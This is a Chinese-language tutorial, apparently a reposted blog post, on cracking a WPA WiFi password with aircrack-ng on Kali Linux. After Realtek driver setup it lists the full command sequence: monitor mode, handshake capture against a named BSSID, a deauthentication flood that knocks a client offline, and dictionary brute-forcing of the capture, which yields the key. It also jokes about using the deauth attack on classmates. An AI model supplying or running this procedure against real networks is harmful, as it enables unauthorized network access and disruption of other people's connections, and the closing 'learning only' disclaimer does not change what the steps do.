实验前提:安装好无线网卡。最好是kali免驱的网卡。

若不是kali免驱动网卡可借鉴以下rtl8812au操作方式

  1. sudo apt update更新源列表
  2. apt upgrade命令将尝试下载在apt服务器上具有更新的所有软件包
  3. apt-get dist-upgrade升级系统相关依赖
  4. 重启或试试以下两个驱动命令:
  5. sudo apt install linux-headers-$(uname -r)
  6. sudo apt install -y linux-headers-$(uname -r) build-essential dkms git libelf-dev
  7. 安装驱动
  8. apt install realtek-rtl88xxau-dkms
  9. 重启试试能不能读到网卡
  10. 在vmware选项中依次打开 虚拟机
  11. 因为kali已经把rtl8812 集成起来了就不用像其他博主那样修改头文件等等操作。直接按序执行1-9步骤就可以了
  12. 参考网站:https://www.csdn.net/tags/MtTaIg0sOTI0NjQwLWJsb2cO0O0O.html

1,提权:

sudo -i

2,查看网卡信息

ifconfig

注:wlan0就是你的无线网卡

3,开启网卡监听模式

airmon-ng start wlan0

注意:开启监听网卡后,一般情况下监听网卡会由wlan0变成wlan0mon,但是部分不会改变名字不用纠结。若名字发送更改,则后续操作都是wlan0mon即可

4,扫描范围内的无线网

airodump-ng wlan0

5,抓包

airodump-ng -c 11 --bssid 2E:C9:58:CC:C1:64 -w /home/kali/桌面/hack wlan0 
11为上图的ch,含义是频道 
2E:C9:58:CC:C1:64为上图的bssid 含义是目标wifi的mac地址 
-w /home/kali/桌面/hack 在桌面保存中间文件命名为hack (中间文件有很多个但是我们只需要后缀为.cap的文件)

6,ack攻击

大致原理:WiFi断开连接后会自动重连,从而截获重连的中间数据报

重新打开一个命令行,原先的的控制行不要关闭

1,同样进行提权 sudo -i 
2,aireplay-ng -0 90 -a 2E:C9:58:CC:C1:64 -c A4:B1:C1:06C2:AA wlan0 
处理5g频段时aireplay-ng -0 90 -a 2E:C9:58:CC:C1:64  -c A4:B1:C1:06C2:AA -D wlan0
-0 90 意思是攻击90次,一般尽量在60-100之间不易过多,不宜过少。若过少会发生''Packets contained no EAPOL data; unable to process this AP''错误即抓取不到数据报 
-a 2E:C9:58:CC:C1:64 目标wifi的mac值 
-c A4:B1:C1:06C2:AA 是要踢下线的设备的mac地址上图的station字段值,下图已标记

7,暴力破解

aircrack-ng -w /home/kali/桌面/PassWord2.txt -b 2E:C9:58:CC:C1:64 /home/kali/桌面/hack-01.cap 
/home/kali/桌面/PassWord2.txt 为暴力破解的字典,随便在github上搜索弱口令就可以搜到 
-b 2E:C9:58:CC:C1:64 目标wifimac地址 /home/kali/桌面/hack-01.cap 这就是第5步抓包产生的文件

得到key=987654321

注只要字典够强大就可以破解。但是在第6步的ack攻击可以用于同学间增强友谊的方式。攻击次数过多你同学会感谢你的

实验仅供学习使用严禁用于非法用途。

Logo

为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。

更多推荐